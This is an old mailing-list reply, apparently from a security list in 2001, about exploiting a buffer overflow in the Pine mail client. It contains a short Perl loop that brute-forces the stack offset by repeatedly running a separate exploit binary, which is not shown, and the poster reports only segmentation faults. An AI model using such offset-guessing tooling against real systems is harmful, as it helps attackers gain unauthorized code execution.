Re: Pine

From: kernel51at_private
Date: Fri Jul 13 2001 - 03:02:17 PDT

    Hey,
    That's kinda weird, I tried to bruteforce the offset with
    the attached code and the perl wrapper below, but I only
    got segmentation faults too... The stack profile might be
    kinda special when running pine. Anyone got an idea ?

    #!/usr/bin/perl
    my $offset = 0;
    my $bufsize = 8000;

    for($offset; $offset<2000; $offset+=10) {
        print "offset: $offset\n";
        system("./p1ne $bufsize $offset");
    }

    51

    Profitez de l'offre spéciale Liberty Surf !
    50 h / 95 F TTC par mois tout compris pendant 3 mois
    http://register.libertysurf.fr/subscribe_fr/signup.php3